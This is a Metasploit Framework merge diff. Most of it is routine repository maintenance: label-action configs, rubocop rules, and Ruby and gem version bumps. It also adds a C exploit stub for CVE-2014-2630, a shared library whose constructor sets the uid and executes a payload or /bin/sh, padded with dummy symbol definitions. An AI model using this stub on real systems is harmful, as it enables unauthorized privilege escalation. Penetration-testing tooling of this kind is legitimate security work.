Land #13470, Pi-Hole < 4.3.3 dhcp static address RCE

Plus additional reference.

.github/label-actions.yml

@@ -0,0 +1,113 @@
+# Configuration for Github App - https://github.com/dessant/label-actions
+#
+# Note: Be aware of the edge cases of YAML when writing multiline strings:
+#   - https://yaml-multiline.info/
+#   - https://github.com/dessant/label-actions/issues/1
+pulls:
+  actions:
+    attic:
+      close: true
+      comment: |
+        Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it `attic` and closed it for now.
+
+        What does this generally mean? It could be one or more of several things:
+
+        - It doesn't look like there has been any activity on this pull request in a while
+        - We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
+        - Sometimes the implementation isn't quite right and a different approach is necessary.
+
+        We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
+
+    needs-docs:
+      comment: |
+        Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
+
+        - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+        - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
+        - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
+
+    needs-linting:
+      comment: |
+        Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
+
+        We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
+
+        ```
+        rubocop <directory or file>
+        tools/dev/msftidy.rb <directory or file>
+        ```
+
+        You can automate most of these changes with the `-a` flag:
+
+        ```
+        rubocop -a <directory or file>
+        ```
+
+        Please update your branch after these have been made, and reach out if you have any problems.
+
+    needs-unique-branch:
+      close: true
+      comment: |
+        Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
+
+        Please create a new branch in your fork of framework and resubmit this from that branch.
+
+        If you are using Git on the command line that may look like:
+
+        ```
+        # Checkout the master branch
+        git checkout master
+
+        # Create a new branch for your feature
+        git checkout -b <BRANCH_NAME>
+
+        # Add your new files
+        git add modules/my-cool-new-module
+
+        # Commit your changes with a relevant message
+        git commit
+
+        # Push your changes to GitHub
+        git push origin <BRANCH_NAME>
+
+        # Now browse to the following URL and create your pull request!
+        # - https://github.com/rapid7/metasploit-framework/pulls
+        ```
+
+        This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
+
+        Please do resubmit from a unique branch, we greatly value your contribution! :tada:
+
+    needs-testing-environment:
+      comment: |
+        Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
+
+        We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
+
+        To help unblock this pull request, please:
+
+        - Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
+        - Or comment guided steps on how to set up our environment for testing this module
+        - Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
+
+        Once there's a clear path for testing and evaluating this module, we can progress with this further.
+
+issues:
+  actions:
+    termux:
+      comment: |
+        Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
+
+        However, Metasploit reportedly does work with Termux.
+
+        Refer to the following for more information:
+
+        * https://wiki.termux.com/wiki/Metasploit_Framework
+        * termux/termux-packages/issues/715
+
+    potato:
+      close: true
+      comment: |
+        When creating an issue, please ensure that the default issue template has been updated with the required details.
+
+        Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.

.github/label-commenter-config.yml

@@ -1,15 +0,0 @@
-labels:
-  - name: needs-docs
-    labeled:
-      pr:
-        body: |
-          Thanks for your pull request, before this can be merged - corresponding documentation for your module is required:
-          - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
-          - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
-          - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
-        action: open
-    unlabeled:
-      issue:
-        body: |
-          Thank you for adding module documentation :tada:
-        action: open

.github/workflows/label-commenter.yml

@@ -1,29 +0,0 @@
-#
-# Automatically respond to any issues/pull requests that have the given labels assigned.
-#
-name: Label Commenter
-
-on:
-  issues:
-    types:
-      - labeled
-      - unlabeled
-  pull_request:
-    types:
-      - labeled
-      - unlabeled
-
-jobs:
-  comment:
-    runs-on: ubuntu-18.04
-    steps:
-      - uses: actions/checkout@v2
-        with:
-          ref: master
-
-      - name: Label Commenter
-        # Note: Using SHA explicitly for v1.2.3 - https://julienrenaux.fr/2019/12/20/github-actions-security-risk/
-        uses: peaceiris/actions-label-commenter@93941f8f189a4b92ab75059aa39fe421469253f4
-        with:
-          github_token: ${{ secrets.GITHUB_TOKEN }}
-          config_file: .github/label-commenter-config.yml

.mailmap

@@ -12,6 +12,7 @@ cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
 ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
+gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
 jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
 jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
 jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>

.rubocop.yml

@@ -155,6 +155,10 @@ Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
+Layout/FirstArrayElementLineBreak:
+  Enabled: true
+  Description: 'This cop checks for a line break before the first element in a multi-line array.'
+
 Layout/FirstArrayElementIndentation:
   Enabled: true
   EnforcedStyle: consistent
@@ -224,6 +228,16 @@ Style/RedundantBegin:
     # end
     - 'modules/**/*'
 
+Style/SafeNavigation:
+  Description: >-
+    This cop transforms usages of a method call safeguarded by
+    a check for the existence of the object to
+    safe navigation (`&.`).
+
+    This has been disabled as in some scenarios it produced invalid code, and disobeyed the 'AllowedMethods'
+    configuration.
+  Enabled: false
+
 Documentation:
   Exclude:
     - 'modules/**/*'

.ruby-version

@@ -1 +1 @@
-2.6.5
+2.6.6

.travis.yml

@@ -11,8 +11,8 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.5.7'
-  - '2.6.5'
+  - '2.5.8'
+  - '2.6.6'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'

Dockerfile

@@ -1,4 +1,4 @@
-FROM ruby:2.6.5-alpine3.10 AS builder
+FROM ruby:2.6.6-alpine3.10 AS builder
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.83)
+    metasploit-framework (5.0.91)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -11,6 +11,7 @@ PATH
       bcrypt (= 3.1.12)
       bcrypt_pbkdf
       bit-struct
+      bson
       concurrent-ruby (= 1.0.5)
       dnsruby
       ed25519
@@ -27,12 +28,13 @@ PATH
       metasploit-concern (~> 2.0.0)
       metasploit-credential (~> 3.0.0)
       metasploit-model (~> 2.0.4)
-      metasploit-payloads (= 1.3.86)
+      metasploit-payloads (= 1.4.2)
       metasploit_data_models (~> 3.0.10)
       metasploit_payloads-mettle (= 0.5.21)
       mqtt
       msgpack
       nessus_rest
+      net-ldap
       net-ssh
       network_interface
       nexpose
@@ -86,27 +88,27 @@ GEM
   remote: https://rubygems.org/
   specs:
     Ascii85 (1.0.3)
-    actionpack (4.2.11.1)
-      actionview (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
+    actionpack (4.2.11.3)
+      actionview (= 4.2.11.3)
+      activesupport (= 4.2.11.3)
       rack (~> 1.6)
       rack-test (~> 0.6.2)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11.1)
-      activesupport (= 4.2.11.1)
+    actionview (4.2.11.3)
+      activesupport (= 4.2.11.3)
       builder (~> 3.1)
       erubis (~> 2.7.0)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11.1)
-      activesupport (= 4.2.11.1)
+    activemodel (4.2.11.3)
+      activesupport (= 4.2.11.3)
       builder (~> 3.1)
-    activerecord (4.2.11.1)
-      activemodel (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
+    activerecord (4.2.11.3)
+      activemodel (= 4.2.11.3)
+      activesupport (= 4.2.11.3)
       arel (~> 6.0)
-    activesupport (4.2.11.1)
+    activesupport (4.2.11.3)
       i18n (~> 0.7)
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
@@ -118,34 +120,35 @@ GEM
     arel-helpers (2.11.0)
       activerecord (>= 3.1.0, < 7)
     ast (2.4.0)
-    aws-eventstream (1.0.3)
-    aws-partitions (1.288.0)
-    aws-sdk-core (3.92.0)
-      aws-eventstream (~> 1.0, >= 1.0.2)
+    aws-eventstream (1.1.0)
+    aws-partitions (1.318.0)
+    aws-sdk-core (3.96.1)
+      aws-eventstream (~> 1, >= 1.0.2)
       aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
       jmespath (~> 1.0)
-    aws-sdk-ec2 (1.151.0)
+    aws-sdk-ec2 (1.161.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.34.0)
+    aws-sdk-iam (1.37.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.30.0)
+    aws-sdk-kms (1.31.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.61.1)
-      aws-sdk-core (~> 3, >= 3.83.0)
+    aws-sdk-s3 (1.65.0)
+      aws-sdk-core (~> 3, >= 3.96.1)
       aws-sdk-kms (~> 1)
       aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.1)
+    aws-sigv4 (1.1.3)
       aws-eventstream (~> 1.0, >= 1.0.2)
     bcrypt (3.1.12)
     bcrypt_pbkdf (1.0.1)
-    bindata (2.4.6)
+    bindata (2.4.7)
     bit-struct (0.16)
+    bson (4.8.2)
     builder (3.2.4)
-    byebug (11.1.1)
+    byebug (11.1.3)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
     cookiejar (0.3.3)
@@ -166,14 +169,14 @@ GEM
       eventmachine (>= 1.0.0.beta.4)
     erubis (2.7.0)
     eventmachine (1.2.7)
-    factory_bot (5.1.2)
+    factory_bot (5.2.0)
       activesupport (>= 4.2.0)
-    factory_bot_rails (5.1.1)
-      factory_bot (~> 5.1.0)
+    factory_bot_rails (5.2.0)
+      factory_bot (~> 5.2.0)
       railties (>= 4.2.0)
     faker (2.2.1)
       i18n (>= 0.8)
-    faraday (1.0.0)
+    faraday (1.0.1)
       multipart-post (>= 1.2, < 3)
     faye-websocket (0.10.9)
       eventmachine (>= 0.12.0)
@@ -186,12 +189,11 @@ GEM
     http_parser.rb (0.6.0)
     i18n (0.9.5)
       concurrent-ruby (~> 1.0)
-    jaro_winkler (1.5.4)
     jmespath (1.4.0)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.3.0)
-    loofah (2.4.0)
+    loofah (2.5.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     memory_profiler (0.9.14)
@@ -214,7 +216,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.86)
+    metasploit-payloads (1.4.2)
     metasploit_data_models (3.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -228,12 +230,13 @@ GEM
     metasploit_payloads-mettle (0.5.21)
     method_source (1.0.0)
     mini_portile2 (2.4.0)
-    minitest (5.14.0)
+    minitest (5.14.1)
     mqtt (0.5.0)
     msgpack (1.3.3)
     multipart-post (2.1.1)
     nessus_rest (0.1.6)
-    net-ssh (5.2.0)
+    net-ldap (0.16.2)
+    net-ssh (6.0.2)
     network_interface (0.0.2)
     nexpose (7.2.1)
     nokogiri (1.10.9)
@@ -246,7 +249,7 @@ GEM
     packetfu (1.1.13)
       pcaprub
     parallel (1.19.1)
-    parser (2.7.0.5)
+    parser (2.7.1.2)
       ast (~> 2.4.0)
     patch_finder (1.0.2)
     pcaprub (0.13.0)
@@ -262,13 +265,13 @@ GEM
       activerecord (~> 4.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.13.0)
+    pry (0.13.1)
       coderay (~> 1.1)
       method_source (~> 1.0)
     pry-byebug (3.9.0)
       byebug (~> 11.0)
       pry (~> 0.13.0)
-    public_suffix (4.0.3)
+    public_suffix (4.0.5)
     rack (1.6.13)
     rack-protection (1.5.5)
       rack
@@ -282,9 +285,9 @@ GEM
       rails-deprecated_sanitizer (>= 1.0.1)
     rails-html-sanitizer (1.3.0)
       loofah (~> 2.3)
-    railties (4.2.11.1)
-      actionpack (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
+    railties (4.2.11.3)
+      actionpack (= 4.2.11.3)
+      activesupport (= 4.2.11.3)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
     rainbow (3.0.0)
@@ -306,7 +309,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.22)
+    rex-exploitation (0.1.24)
       jsobfu
       metasm
       rex-arch
@@ -337,7 +340,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.25)
+    rex-text (0.2.26)
     rex-zip (0.1.3)
       rex-text
     rexml (3.2.4)
@@ -346,15 +349,15 @@ GEM
       rspec-core (~> 3.9.0)
       rspec-expectations (~> 3.9.0)
       rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.1)
-      rspec-support (~> 3.9.1)
-    rspec-expectations (3.9.1)
+    rspec-core (3.9.2)
+      rspec-support (~> 3.9.3)
+    rspec-expectations (3.9.2)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.9.0)
     rspec-mocks (3.9.1)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.9.0)
-    rspec-rails (4.0.0)
+    rspec-rails (4.0.1)
       actionpack (>= 4.2)
       activesupport (>= 4.2)
       railties (>= 4.2)
@@ -364,17 +367,19 @@ GEM
       rspec-support (~> 3.9)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.9.2)
-    rubocop (0.80.1)
-      jaro_winkler (~> 1.5.1)
+    rspec-support (3.9.3)
+    rubocop (0.84.0)
       parallel (~> 1.10)
       parser (>= 2.7.0.1)
       rainbow (>= 2.2.2, < 4.0)
       rexml
+      rubocop-ast (>= 0.0.3)
       ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 1.7)
+      unicode-display_width (>= 1.4.0, < 2.0)
+    rubocop-ast (0.0.3)
+      parser (>= 2.7.0.1)
     ruby-macho (2.2.0)
-    ruby-prof (1.3.1)
+    ruby-prof (1.4.1)
     ruby-progressbar (1.10.1)
     ruby-rc4 (0.1.5)
     ruby_smb (1.1.0)
@@ -406,11 +411,11 @@ GEM
     tilt (2.0.10)
     timecop (0.9.1)
     ttfunk (1.6.2.1)
-    tzinfo (1.2.6)
+    tzinfo (1.2.7)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2019.3)
+    tzinfo-data (1.2020.1)
       tzinfo (>= 1.0.0)
-    unicode-display_width (1.6.1)
+    unicode-display_width (1.7.0)
     warden (1.2.7)
       rack (>= 1.0)
     websocket-driver (0.7.1)
@@ -421,7 +426,7 @@ GEM
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.24)
+    yard (0.9.25)
 
 PLATFORMS
   ruby

LICENSE_GEMS

@@ -1,30 +1,31 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11.1, MIT
-actionview, 4.2.11.1, MIT
-activemodel, 4.2.11.1, MIT
-activerecord, 4.2.11.1, MIT
-activesupport, 4.2.11.1, MIT
+actionpack, 4.2.11.3, MIT
+actionview, 4.2.11.3, MIT
+activemodel, 4.2.11.3, MIT
+activerecord, 4.2.11.3, MIT
+activesupport, 4.2.11.3, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 ast, 2.4.0, MIT
-aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.288.0, "Apache 2.0"
-aws-sdk-core, 3.92.0, "Apache 2.0"
-aws-sdk-ec2, 1.151.0, "Apache 2.0"
-aws-sdk-iam, 1.34.0, "Apache 2.0"
-aws-sdk-kms, 1.30.0, "Apache 2.0"
-aws-sdk-s3, 1.61.1, "Apache 2.0"
-aws-sigv4, 1.1.1, "Apache 2.0"
+aws-eventstream, 1.1.0, "Apache 2.0"
+aws-partitions, 1.318.0, "Apache 2.0"
+aws-sdk-core, 3.96.1, "Apache 2.0"
+aws-sdk-ec2, 1.161.0, "Apache 2.0"
+aws-sdk-iam, 1.37.0, "Apache 2.0"
+aws-sdk-kms, 1.31.0, "Apache 2.0"
+aws-sdk-s3, 1.65.0, "Apache 2.0"
+aws-sigv4, 1.1.3, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.6, ruby
+bindata, 2.4.7, ruby
 bit-struct, 0.16, ruby
+bson, 4.8.2, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
-byebug, 11.1.1, "Simplified BSD"
+byebug, 11.1.3, "Simplified BSD"
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
@@ -38,10 +39,10 @@ em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 5.1.2, MIT
-factory_bot_rails, 5.1.1, MIT
+factory_bot, 5.2.0, MIT
+factory_bot_rails, 5.2.0, MIT
 faker, 2.2.1, MIT
-faraday, 1.0.0, MIT
+faraday, 1.0.1, MIT
 faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
@@ -49,28 +50,28 @@ hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
-jaro_winkler, 1.5.4, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.3.0, ruby
-loofah, 2.4.0, MIT
+loofah, 2.5.0, MIT
 memory_profiler, 0.9.14, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.83, "New BSD"
+metasploit-framework, 5.0.91, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.86, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.4.2, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.21, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.14.0, MIT
+minitest, 5.14.1, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.2.0, MIT
+net-ldap, 0.16.2, MIT
+net-ssh, 6.0.2, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.9, MIT
@@ -79,23 +80,23 @@ openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.19.1, MIT
-parser, 2.7.0.5, MIT
+parser, 2.7.1.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.4.0, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
-pry, 0.13.0, MIT
+pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.3, MIT
+public_suffix, 4.0.5, MIT
 rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.3.0, MIT
-railties, 4.2.11.1, MIT
+railties, 4.2.11.3, MIT
 rainbow, 3.0.0, MIT
 rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
@@ -105,7 +106,7 @@ rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.22, "New BSD"
+rex-exploitation, 0.1.24, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
@@ -117,20 +118,21 @@ rex-rop_builder, 0.1.3, "New BSD"
 rex-socket, 0.1.23, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.25, "New BSD"
+rex-text, 0.2.26, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rexml, 3.2.4, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
-rspec-core, 3.9.1, MIT
-rspec-expectations, 3.9.1, MIT
+rspec-core, 3.9.2, MIT
+rspec-expectations, 3.9.2, MIT
 rspec-mocks, 3.9.1, MIT
-rspec-rails, 4.0.0, MIT
+rspec-rails, 4.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.2, MIT
-rubocop, 0.80.1, MIT
+rspec-support, 3.9.3, MIT
+rubocop, 0.84.0, MIT
+rubocop-ast, 0.0.3, MIT
 ruby-macho, 2.2.0, MIT
-ruby-prof, 1.3.1, "Simplified BSD"
+ruby-prof, 1.4.1, "Simplified BSD"
 ruby-progressbar, 1.10.1, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
@@ -149,13 +151,13 @@ thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.6, MIT
-tzinfo-data, 1.2019.3, MIT
-unicode-display_width, 1.6.1, MIT
+tzinfo, 1.2.7, MIT
+tzinfo-data, 1.2020.1, MIT
+unicode-display_width, 1.7.0, MIT
 warden, 1.2.7, MIT
 websocket-driver, 0.7.1, "Apache 2.0"
 websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.24, MIT
+yard, 0.9.25, MIT

data/exploits/CVE-2014-2630/CVE-2014-2630.c

@@ -0,0 +1,3643 @@
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <dlfcn.h>
+void __cxa_finalize (void *d) {
+    return;
+}
+void __attribute__((constructor)) init() {
+    setresuid(geteuid(), geteuid(), geteuid());
+    execl("#{payload_path}", (char *)NULL, (char *)NULL);
+    execl("/bin/sh", (char *)NULL, (char *)NULL);
+}
+int applicationShellClassRec = 0;
+int applicationShellWidgetClass = 0;
+int colorConvertArgs = 0;
+int compositeWidgetClass = 0;
+int constraintClassRec = 0;
+int constraintWidgetClass = 0;
+int coreWidgetClass = 0;
+int dump_external = 0;
+int dump_fontlist = 0;
+int dump_fontlist_cache = 0;
+int dump_internal = 0;
+int FcPatternAddInteger = 0;
+int FcPatternAddString = 0;
+int FcPatternCreate = 0;
+int FcPatternDestroy = 0;
+int GetWidgetNavigPtrs = 0;
+int InitializeScrollBars = 0;
+int _ITM_deregisterTMCloneTable = 0;
+int _ITM_registerTMCloneTable = 0;
+int jpeg_calc_output_dimensions = 0;
+int jpeg_CreateDecompress = 0;
+int jpeg_destroy_decompress = 0;
+int jpeg_finish_decompress = 0;
+int jpeg_read_header = 0;
+int jpeg_read_scanlines = 0;
+int jpeg_start_decompress = 0;
+int jpeg_std_error = 0;
+int jpeg_stdio_src = 0;
+int load_jpeg = 0;
+int localeconv = 0;
+int __longjmp_chk = 0;
+int nl_langinfo = 0;
+int NumLockMask = 0;
+int objectClass = 0;
+int objectClassRec = 0;
+int overrideShellClassRec = 0;
+int png_create_info_struct = 0;
+int png_create_read_struct = 0;
+int png_destroy_read_struct = 0;
+int png_get_channels = 0;
+int png_get_gAMA = 0;
+int png_get_IHDR = 0;
+int png_get_rowbytes = 0;
+int png_get_valid = 0;
+int png_init_io = 0;
+int png_read_end = 0;
+int png_read_image = 0;
+int png_read_info = 0;
+int png_read_update_info = 0;
+int png_set_expand = 0;
+int png_set_gamma = 0;
+int png_set_gray_to_rgb = 0;
+int png_set_longjmp_fn = 0;
+int png_set_sig_bytes = 0;
+int png_set_strip_16 = 0;
+int png_sig_cmp = 0;
+int rectObjClass = 0;
+int rectObjClassRec = 0;
+int ScrollLockMask = 0;
+int SetMwmStuff = 0;
+int T = 0;
+int topLevelShellWidgetClass = 0;
+int transientShellClassRec = 0;
+int transientShellWidgetClass = 0;
+int V = 0;
+int vendorShellClassRec = 0;
+int vendorShellWidgetClass = 0;
+int W = 0;
+int __wctomb_chk = 0;
+int widgetClass = 0;
+int widgetClassRec = 0;
+int wmShellClassRec = 0;
+int wmShellWidgetClass = 0;
+int XAddExtension = 0;
+int XAllocColor = 0;
+int XAllocColorCells = 0;
+int XAllowEvents = 0;
+int XBell = 0;
+int XChangeActivePointerGrab = 0;
+int XChangeGC = 0;
+int XChangeProperty = 0;
+int XChangeWindowAttributes = 0;
+int XCheckIfEvent = 0;
+int XCheckMaskEvent = 0;
+int XClearArea = 0;
+int XClearWindow = 0;
+int XCloseDisplay = 0;
+int XCloseIM = 0;
+int XConfigureWindow = 0;
+int XConvertSelection = 0;
+int XCopyArea = 0;
+int XCopyPlane = 0;
+int XCreateBitmapFromData = 0;
+int XCreateFontCursor = 0;
+int XCreateGC = 0;
+int XCreateIC = 0;
+int XCreateImage = 0;
+int XCreatePixmap = 0;
+int XCreatePixmapCursor = 0;
+int XCreatePixmapFromBitmapData = 0;
+int XCreateRegion = 0;
+int XCreateWindow = 0;
+int XDefaultColormap = 0;
+int XDefaultDepth = 0;
+int XDefaultScreen = 0;
+int XDefaultVisual = 0;
+int XDefineCursor = 0;
+int XDeleteContext = 0;
+int XDeleteProperty = 0;
+int XDestroyIC = 0;
+int XDestroyRegion = 0;
+int XDestroyWindow = 0;
+int XDisplayKeycodes = 0;
+int XDisplayOfScreen = 0;
+int XDisplayString = 0;
+int XDrawArc = 0;
+int XDrawImageString = 0;
+int XDrawImageString16 = 0;
+int XDrawLine = 0;
+int XDrawLines = 0;
+int XDrawPoint = 0;
+int XDrawRectangle = 0;
+int XDrawSegments = 0;
+int XDrawString = 0;
+int XDrawString16 = 0;
+int _XEditResGet16 = 0;
+int _XEditResGet32 = 0;
+int _XEditResGet8 = 0;
+int _XEditResGetSigned16 = 0;
+int _XEditResGetString8 = 0;
+int _XEditResGetWidgetInfo = 0;
+int _XEditResPut16 = 0;
+int _XEditResPut32 = 0;
+int _XEditResPut8 = 0;
+int _XEditResPutString8 = 0;
+int _XEditResPutWidgetInfo = 0;
+int _XEditResResetStream = 0;
+int XEmptyRegion = 0;
+int XEqualRegion = 0;
+int XESetCloseDisplay = 0;
+int XExtentsOfFontSet = 0;
+int XFetchBuffer = 0;
+int XFillArc = 0;
+int XFillPolygon = 0;
+int XFillRectangle = 0;
+int XFillRectangles = 0;
+int XFindContext = 0;
+int XFlush = 0;
+int XFontsOfFontSet = 0;
+int XFree = 0;
+int XFreeColors = 0;
+int XFreeCursor = 0;
+int XFreeFont = 0;
+int XFreeFontNames = 0;
+int XFreeGC = 0;
+int XFreeModifiermap = 0;
+int XFreePixmap = 0;
+int XFreeStringList = 0;
+int XftDrawCreate = 0;
+int XftDrawCreateBitmap = 0;
+int XftDrawDestroy = 0;
+int XftDrawRect = 0;
+int XftDrawSetClip = 0;
+int XftDrawSetClipRectangles = 0;
+int XftDrawString16 = 0;
+int XftDrawString32 = 0;
+int XftDrawStringUtf8 = 0;
+int XftFontClose = 0;
+int XftFontMatch = 0;
+int XftFontOpenPattern = 0;
+int XftTextExtents16 = 0;
+int XftTextExtents32 = 0;
+int XftTextExtents8 = 0;
+int XftTextExtentsUtf8 = 0;
+int XGetAtomName = 0;
+int XGetFontProperty = 0;
+int XGetGCValues = 0;
+int XGetGeometry = 0;
+int XGetICValues = 0;
+int XGetImage = 0;
+int XGetIMValues = 0;
+int XGetInputFocus = 0;
+int XGetKeyboardMapping = 0;
+int XGetModifierMapping = 0;
+int XGetOCValues = 0;
+int XGetOMValues = 0;
